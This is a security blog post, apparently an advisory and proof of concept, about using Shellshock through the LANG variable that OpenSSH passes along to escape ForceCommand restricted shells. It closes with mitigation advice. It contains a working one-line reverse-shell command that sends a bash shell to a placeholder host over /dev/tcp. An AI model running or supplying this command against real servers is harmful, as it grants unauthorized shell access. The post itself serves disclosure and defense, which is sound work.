Skip to content
  • About Me
  • Books
  • Photography
  • Papers
  • Security
  • Forensics
  • Essays
  • Christianity

Calendar

July 2022
M T W T F S S
 123
45678910
11121314151617
18192021222324
25262728293031
« Jun    

Archives

  • June 2022
  • May 2022
  • March 2022
  • January 2022
  • December 2021
  • November 2021
  • September 2021
  • July 2021
  • January 2021
  • December 2020
  • November 2020
  • March 2020
  • September 2019
  • August 2019
  • November 2018
  • August 2018
  • March 2018
  • March 2017
  • February 2017
  • January 2017
  • November 2016
  • October 2016
  • July 2016
  • May 2016
  • April 2016
  • March 2016
  • February 2016
  • June 2015
  • March 2015
  • February 2015
  • December 2014
  • November 2014
  • October 2014
  • September 2014
  • August 2014
  • July 2014
  • June 2014
  • May 2014
  • April 2014
  • March 2014
  • January 2014
  • October 2013
  • September 2013
  • June 2013
  • May 2013
  • April 2013
  • December 2012
  • May 2012
  • September 2011
  • June 2011
  • August 2010
  • July 2010
  • May 2010
  • April 2010
  • March 2010
  • February 2010
  • July 2009
  • May 2008
  • March 2008
  • January 2008
  • June 2007
  • August 2006
  • February 2006

Categories

  • Apple
  • Christianity
  • Essays
  • Forensics
  • General
  • Machine Learning
  • Music
  • Opinion
  • Photography
  • Politics
  • Security











ZdziarskiDFIR, security, reverse engineering, photography, theology, funky bass guitar. All opinions are my own.
  • About Me
  • Books
  • Photography
  • Papers
  • Security
  • Forensics
  • Essays
  • Christianity
Security

Shellshock OpenSSH restricted shell RCE/PE Proof of Concept

On September 26, 2014 by Jonathan Zdziarski

Synopsis:

The sshd daemon used in OpenSSH supports a ForceCommand directive, allowing shell logins to be restricted to specific commands. This is often used in configuring sshd for cvs/git accounts, restricted shells, or management scripts. The ForceCommand directive can be employed system wide, or just for specific users.

Vulnerability:

By default, sshd is configured to allow the LANG environment variable to be pass through prior to execution of the restricted shell. On systems vulnerable to the bash/shellshock vulnerability, LANG can be set in such a way that spawns a remote shell or executes other code on the server, effectively bypassing the forced command and allowing full account access. This can be taken advantage of after the user has authenticated via ssh, and so such systems are only at risk from abuse by their own authorized users, however such users are normally restricted from being able to execute arbitrary commands, and so this is more of a privilege escalation in such cases. This vulnerability can be even more dangerous on systems with open restricted accounts, in which case it becomes an RCE risk.

The following code invokes an ssh session that will use shellshock to spawn a remote shell on port 8000 to the IP address at A.B.C.D.

$ env LANG='() { :; }; /bin/bash -i >& /dev/tcp/A.B.C.D/8000 0>&1' ssh target_host

Local demonstration on Mac OS X Mavericks:

IMG_0072

 

Demonstrated remotely on a vulnerable Linux machine:

Screen Shot 2014-09-26 at 10.53.07 AM

Recommendations:

It is recommended that the following AcceptEnv directives be removed from sshd_config:

AcceptEnv LANG LC_*

Other standard installations of OpenSSH also include other AcceptEnv directives, which should be removed. For example, many Linux distributions also accept LANGUAGE, XMODIFIERS, and other environment variables.  This will prevent sshd from passing through the LANG and related environment variables to the forced command. Other environment variables may still be affected, however, and so a full solution is to patch for the shellshock vulnerability.

 

 

Archives

  • June 2022
  • May 2022
  • March 2022
  • January 2022
  • December 2021
  • November 2021
  • September 2021
  • July 2021
  • January 2021
  • December 2020
  • November 2020
  • March 2020
  • September 2019
  • August 2019
  • November 2018
  • August 2018
  • March 2018
  • March 2017
  • February 2017
  • January 2017
  • November 2016
  • October 2016
  • July 2016
  • May 2016
  • April 2016
  • March 2016
  • February 2016
  • June 2015
  • March 2015
  • February 2015
  • December 2014
  • November 2014
  • October 2014
  • September 2014
  • August 2014
  • July 2014
  • June 2014
  • May 2014
  • April 2014
  • March 2014
  • January 2014
  • October 2013
  • September 2013
  • June 2013
  • May 2013
  • April 2013
  • December 2012
  • May 2012
  • September 2011
  • June 2011
  • August 2010
  • July 2010
  • May 2010
  • April 2010
  • March 2010
  • February 2010
  • July 2009
  • May 2008
  • March 2008
  • January 2008
  • June 2007
  • August 2006
  • February 2006

Calendar

July 2022
M T W T F S S
 123
45678910
11121314151617
18192021222324
25262728293031
« Jun    

Categories

  • Apple
  • Christianity
  • Essays
  • Forensics
  • General
  • Machine Learning
  • Music
  • Opinion
  • Photography
  • Politics
  • Security

All Content Copyright (c) 2000-2022 by Jonathan Zdziarski, All Rights Reserved